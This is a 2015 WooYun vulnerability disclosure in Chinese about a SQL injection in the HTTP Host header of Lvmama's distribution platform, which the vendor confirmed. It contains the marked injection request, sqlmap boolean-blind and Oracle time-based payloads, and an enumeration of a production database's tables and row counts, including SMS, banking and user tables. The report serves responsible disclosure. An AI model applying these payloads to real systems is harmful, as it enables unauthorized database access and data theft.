当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124841

漏洞标题:驴妈妈某重要平台HTTP头存在SQL注入漏洞

相关厂商:驴妈妈旅游网

漏洞作者: 深度安全实验室

提交时间:2015-07-06 11:39

修复时间:2015-08-20 13:04

公开时间:2015-08-20 13:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已经确认,细节仅向厂商公开
2015-07-16: 细节向核心白帽子及相关领域专家公开
2015-07-26: 细节向普通白帽子公开
2015-08-05: 细节向实习白帽子公开
2015-08-20: 细节向公众公开

简要描述:

驴妈妈某重要平台HTTP头存在SQL注入漏洞

详细说明:

http://fenxiao.lvmama.com/


GET / HTTP/1.1
Host: fenxiao.lvmama.com*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fenxiao.lvmama.com/home/index.jsp
Cookie: JSESSIONID=eS5SEMyyrred
Connection: keep-alive

Host参数
19个库:

11111.png


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Host (Host)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fenxiao.lvmama.com' AND 4081=4081 AND 'UwgJ'='UwgJ
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: -5437' OR 5236=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(68)||CHR(106),5) AND 'CZop'='CZop
---
web application technology: Apache
back-end DBMS: Oracle
Database: SAAS0
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| MLOG$_B2B_TICKET_DETAIL | 794489 |
| MLOG$_ROOM_INFO | 739820 |
| SYS_SMS_LOG | 632524 |
| MLOG$_INFO_NEWS | 599452 |
| MLOG$_INFO_TICKET_PRICE | 513239 |
| SITE_IP2 | 403384 |
| MLOG$_INFO_TICKET_RELVIEW | 371299 |
| MLOG$_INFO_HOTEL | 297430 |
| USR_ENTERPRISE_TAG | 279279 |
| MLOG$_SAAS_USER_INFO1 | 250810 |
| SAAS_VIEW_SUB | 220785 |
| CRUEL_CODE_LOG | 211624 |
| USR_VIEW_MSG | 197004 |
| CUST_BALANCE_LOG | 174868 |
| ROOM_INFO | 149771 |
| INFO_BANK_TMP | 126068 |
| INFO_BANK | 117283 |
| MLOG$_USR_VIEW | 102701 |
| MLOG$_INFO_TICKET_COND | 94586 |
| USR_VIEW | 85337 |
| INTERFACE_HOTEL_SET | 68054 |
| INTERFACE_QUNAR_LOG | 67402 |
| USR_VIEW_COPY | 65389 |
| CRUEL_CODE_LIST | 62173 |
| INTERFACE_IMAGECO | 61732 |
| CRUEL_CODE_MESSAGE | 61445 |
| HOTEL_INFO | 60710 |
| MLOG$_INFO_TICKET_DETAIL | 54829 |
| T_LANDMARK | 51918 |
| INTERFACE_FZG_HOTEL | 35793 |
| T_VENUE_SUB | 27718 |
| JP_INFO_FLIGHT | 25133 |
| T_VENUE | 24033 |
| EXPCODE_DETAIL | 23496 |
| INTERFACE_SUPPLY_SYNC_LOG | 17963 |
| CRUEL_CODE_VERIFY | 14197 |
| MLOG$_SAAS_USER_INFO | 13659 |
| MLOG$_USR_VIEW1 | 12552 |
| MLOG$_INFO_TRAVEL | 12419 |
| MLOG$_INFO_TICKET_RELAREA | 12241 |
| TB_RECEIVE_LOG | 12138 |
| BANK_CITYCODE | 11293 |
| AUDIT_INFO | 10611 |
| SAAS_PAY_DRAWMONEY | 8870 |
| TB_CONSUME_CODE | 8680 |
| INFO_AREA | 8416 |
| INFO_AREA_EX | 8389 |
| INTERFACE_HOTEL | 8256 |
| INFO_CAR_TYPE | 7354 |
| MLOG$_INFO_CONDS | 7249 |
| SAAS_USER_INFO_LOG | 5012 |
| INTERFACE_LONG | 4900 |
| USR_VIEW_COLUMN | 4780 |
| USR_MSG | 4164 |
| T_REGIONS_QD | 3891 |
| TEMP_LTJL_AREA_INFO | 3469 |
| ALITRIP_COUNTRY | 3330 |
| TEMP_SYR_AREA_INFO | 3252 |
| T_REGIONS | 3207 |
| INTERFACE_QUNAR_MOVE | 2666 |
| HOTEL_DISTRICT | 2598 |
| SAAS_VAP_ORDER | 2571 |
| MLOG$_INFO_CAR | 2500 |
| SAAS_PAY_DRAWMONEY_LOG | 2480 |
| MLOG$_TB_USR_INFO1 | 2450 |
| SAAS_INFO_AREA | 2247 |
| USR_VIEW_LINK | 2191 |
| INTERFACE_FZG_BIZZONE | 1999 |
| MLOG$_INFO_VISA | 1782 |
| ALITRIP_ROOMTYPE222 | 1189 |
| RECE_PAYMENT_LIST | 1018 |
| TB_USR_INFO | 1007 |
| JP_INFO_AIRPORT | 940 |
| SAAS_ORDER_CHANNEL | 939 |
| USR_VIEW_MSG_HIS | 935 |
| T_REGIONS_SUBWAY | 928 |
| INFO_VISA_SORT | 874 |
| INTERFACE_LLK_CODE | 843 |
| SAAS_USER_INFO | 843 |
| MLOG$_HOTEL_INFO1 | 773 |
| USR_VIEW_NAV | 752 |
| B2C_TAOBAO_LOG | 515 |
| T_VENUE_COUNT | 497 |
| INTERFACE_MTS_LOG | 468 |
| ONLINE_DEBUG_LOG | 457 |
| USR_VIEW_PAGE | 441 |
| INTERFACE_USER_SET | 434 |
| MLOG$_INFO_TICKET_CANCEL | 351 |
| SAAS_PERMISSION | 346 |
| INTERFACE_USER_SET_LOG | 316 |
| SAAS_BUY_LOG | 313 |
| INTERFACE_LUOHUSHAN_LOG | 310 |
| SAAS_AREA_SUB | 307 |
| USR_PAGES | 303 |
| ALITRIP_HOTEL222 | 294 |
| WX_SET | 269 |
| INTERFACE_QUNAR_HOTEL_LOG | 229 |
| JP_INFO_AIRWAYS | 221 |
| T_SPORTTYPE | 213 |
| USR_TAG | 202 |
| MLOG$_HOTEL_DISTRICT1 | 199 |
| SAAS_INFO_SUB | 179 |
| SAAS_PAY_SET | 171 |
| CUST_INFO_GROUP_CHANNEL | 128 |
| SAAS_NEWS | 121 |
| SAAS_SERVICE_ADD_LOG | 116 |
| SYS_MENU | 113 |
| CRUEL_CODE_POS | 103 |
| INTERFACE_QUNAR | 100 |
| HOTEL_BRAND | 97 |
| SMSINTERFACE_SET_LOG | 94 |
| TB_VIEW_INFO | 89 |
| INTERFACE_INFO | 86 |
| EXPCODE_LIST | 82 |
| B2C_TAOBAO_ORDER | 68 |
| SAAS_SERVICE | 58 |
| USR_POWER_AREA | 58 |
| B2C_TAOBAO_PRODUCT | 54 |
| UNIONPAY_TRADE_LOG | 49 |
| B2C_TAOBAO_ORDER_LOG | 40 |
| SAAS_USER_MEMO | 39 |
| CRUEL_CODE_CUST | 36 |
| T_VENUE_RECORD | 35 |
| INTERFACE_MAP | 33 |
| SAAS_ORDER_SOURCE | 33 |
| INTERFACE_TICKET | 32 |
| USR_LOGIN | 32 |
| SYS_CURRENCY_RATE | 25 |
| MLOG$_SAAS_PERMISSION1 | 23 |
| SMS_CONSUME_LOG | 23 |
| SAAS_NEWS_SORT | 19 |
| SAAS_CLUSTER | 17 |
| CRUEL_EXP_LIST | 15 |
| INTERFACE_QUNAR_HOTEL | 15 |
| JP_INFO_PLANE | 15 |
| INTERFACE_IMAGECO_CUST | 11 |
| INTERFACE_LLK_CUST | 10 |
| SAAS_PAY_SERVICE | 10 |
| USR_VIEW_TEMPLATE | 10 |
| SAAS_PAY_PRODUCT_TYPE | 9 |
| SMSINTERFACE_INFO | 9 |
| SAAS_VAP_PRODUCT | 8 |
| SMSINTERFACE_USER_SET | 8 |
| B2C_TAOBAO_NOTIFYRECEIVEMSG | 7 |
| INTERFACE_MEITUAN | 7 |
| MLOG$_INTERFACE_LLK_CUST | 7 |
| MLOG$_USR_ENTERPRISE_TAG | 7 |
| SAAS_PROD_TYPE | 6 |
| SAAS_TABLE_SQL | 6 |
| SAAS_AGENT_INFO | 5 |
| SMS_GETMONEY_LOG | 5 |
| USR_INFO | 5 |
| BAIDU_TICKET_INFO | 4 |
| INTERFACE_MTS | 4 |
| WX_TEMP_INFO | 4 |
| B2B_SETTLE_METHOD | 3 |
| INTERFACE_PIAOGJ | 3 |
| SAAS_MESSAGE_ADDIN | 3 |
| SAAS_MESSAGE_RSS | 3 |
| B2C_TAOBAO_CONFIG | 2 |
| BAIDU_TICKET_VIEW | 2 |
| CRUEL_EXP_CODE | 2 |
| SAAS_NOTICE | 2 |
| TMP_USR_VIEW | 2 |
| UNIONPAY_CONFIG | 2 |
| INTERFACE_PRICE_RULE | 1 |
| MLOG$_INFO_PROD | 1 |
| SAAS_MONITORING | 1 |
| T_VENUE_PRICE | 1 |
+-----------------------------+---------+


不深入了~

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-06 13:03

厂商回复:

谢谢

最新状态:

暂无